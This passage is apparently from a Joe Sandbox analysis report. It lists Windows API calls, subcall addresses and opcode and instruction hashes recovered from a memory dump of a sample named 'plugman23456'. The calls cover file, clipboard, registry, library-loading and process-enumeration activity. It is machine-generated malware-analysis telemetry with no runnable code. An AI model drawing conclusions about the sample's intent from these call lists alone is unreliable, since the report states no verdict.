                          • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                          • Instruction ID: 68238382b965d6cf35967491492c160b6f6d54887ef21f0023ff885919cfaa00
                          • Opcode Fuzzy Hash: 47b7cceb40ac73e48e091e39f89a81a5349c65788578bfc7b3808e4b699817ff
                          • Instruction Fuzzy Hash: 695126B5A00209AFCB14DFD4C884CEFBBB9FF88705B14C559F512AB254E735AA46CB60
                          APIs
                            • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                            • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000), ref: 0040A044
                            • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                            • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                          • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$Time$CloseCompareCreateHandlememset
                          • String ID:
                          • API String ID: 2154303073-0
                          • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                          • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                          • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                          • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                          APIs
                            • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(?,00000000,000000F1,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 0041362A
                          Similarity
                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                          • String ID:
                          • API String ID: 3150196962-0
                          • Opcode ID: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                          • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                          • Opcode Fuzzy Hash: 095a0049c7a0b0aa8adc47b9682ac82dede396c8921c9c5897dae779e37db889
                          • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                          APIs
                          • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Similarity
                          • API ID: File$PointerRead
                          • String ID:
                          • API String ID: 3154509469-0
                          • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                          • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                          • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                          • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                          APIs
                          • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                            • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                            • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                            • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                          Similarity
                          • API ID: PrivateProfile$StringWrite_itowmemset
                          • String ID:
                          • API String ID: 4232544981-0
                          • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                          • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                          • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                          • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                          APIs
                          • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                          • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                          • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                          • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                          APIs
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll,00000000,00413F2F,00000000,00413E1F,00000000,?), ref: 00413F6F
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                            • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                          • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                          Similarity
                          • API ID: AddressProc$FileModuleName
                          • String ID:
                          • API String ID: 3859505661-0
                          • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                          • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                          • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                          • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                          APIs
                          • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                          • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                          • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                          • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                          APIs
                          • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000), ref: 0040A325
                          Similarity
                          • API ID: FileWrite
                          • String ID:
                          • API String ID: 3934441357-0
                          • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                          • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                          • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                          • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                          APIs
                          • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                          • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                          • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                          • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                          APIs
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                          • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                          • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                          • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                          • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                          • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                          • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                          APIs
                          • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000), ref: 004096EE
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                          • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                          • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                          • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                          APIs
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                          • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                          • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                          • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                          APIs
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                          • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                          • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                          • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                          APIs
                          • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                          • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                          • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                          • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                          APIs
                          • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                          Similarity
                          • API ID: EnumNamesResource
                          • String ID:
                          • API String ID: 3334572018-0
                          • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                          • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                          • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                          • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                          APIs
                          • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                          Similarity
                          • API ID: FreeLibrary
                          • String ID:
                          • API String ID: 3664257935-0
                          • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                          • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                          • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                          • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                          APIs
                          • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                          Similarity
                          • API ID: CloseFind
                          • String ID:
                          • API String ID: 1863332320-0
                          • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                          • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                          • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                          • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                          APIs
                          • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                          Similarity
                          • API ID: Open
                          • String ID:
                          • API String ID: 71445658-0
                          • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                          • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                          • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                          • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                          APIs
                          • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                          Similarity
                          • API ID: AttributesFile
                          • String ID:
                          • API String ID: 3188754299-0
                          • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                          • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                          • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                          • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                          • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                          • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                          • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                          APIs
                          • memset.MSVCRT ref: 004095FC
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                            • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                            • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                          Similarity
                          • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                          • String ID:
                          • API String ID: 3655998216-0
                          • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                          • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                          • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                          • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                          APIs
                          • memset.MSVCRT ref: 00445426
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                            • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                            • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                            • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040B80C
                          Similarity
                          • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                          • String ID:
                          • API String ID: 1828521557-0
                          • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                          • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                          • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                          • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                          APIs
                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                            • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000), ref: 004062C2
                          • memcpy.MSVCRT ref: 00406942
                          Similarity
                          • API ID: ??2@FilePointermemcpy
                          • String ID:
                          • API String ID: 609303285-0
                          • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                          • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                          • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                          • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                          APIs
                          Similarity
                          • API ID: _wcsicmp
                          • String ID:
                          • API String ID: 2081463915-0
                          • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                          • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                          • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                          • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                          APIs
                            • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                          • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          Similarity
                          • API ID: File$CloseCreateErrorHandleLastRead
                          • String ID:
                          • API String ID: 2136311172-0
                          • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                          • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                          • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                          • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                          APIs
                            • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                          • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                          Similarity
                          • API ID: ??2@??3@
                          • String ID:
                          • API String ID: 1936579350-0
                          • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                          • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                          • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                          • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                          APIs
                          • EmptyClipboard.USER32 ref: 004098EC
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                          • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                          • GlobalFix.KERNEL32(00000000), ref: 00409927
                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                          • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                          • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                          • GetLastError.KERNEL32 ref: 0040995D
                          • CloseHandle.KERNEL32(?), ref: 00409969
                          • GetLastError.KERNEL32 ref: 00409974
                          • CloseClipboard.USER32 ref: 0040997D
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                          • String ID:
                          • API String ID: 2565263379-0
                          • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                          • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                          • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                          • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                          APIs
                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                          • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$AddressFreeLoadMessageProc
                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                          • API String ID: 2780580303-317687271
                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                          APIs
                          • EmptyClipboard.USER32 ref: 00409882
                          • wcslen.MSVCRT ref: 0040988F
                          • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                          • GlobalFix.KERNEL32(00000000), ref: 004098AC
                          • memcpy.MSVCRT ref: 004098B5
                          • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                          • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                          • CloseClipboard.USER32 ref: 004098D7
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                          • String ID:
                          • API String ID: 2014503067-0
                          • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                          • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                          • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                          • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                          APIs
                          • GetLastError.KERNEL32 ref: 004182D7
                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                          • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                          • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                          • LocalFree.KERNEL32(?), ref: 00418342
                          • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                            • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                            • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                          • String ID: OsError 0x%x (%u)
                          • API String ID: 403622227-2664311388
                          • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                          • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                          • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                          • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                          APIs
                            • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                            • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                            • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                          • OpenClipboard.USER32(?), ref: 00411878
                          • GetLastError.KERNEL32 ref: 0041188D
                          • DeleteFileW.KERNEL32(?), ref: 004118AC
                            • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                            • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                            • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                            • Part of subcall function 004098E2: GlobalFix.KERNEL32(00000000), ref: 00409927
                            • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                            • Part of subcall function 004098E2: GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                            • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                            • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                            • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
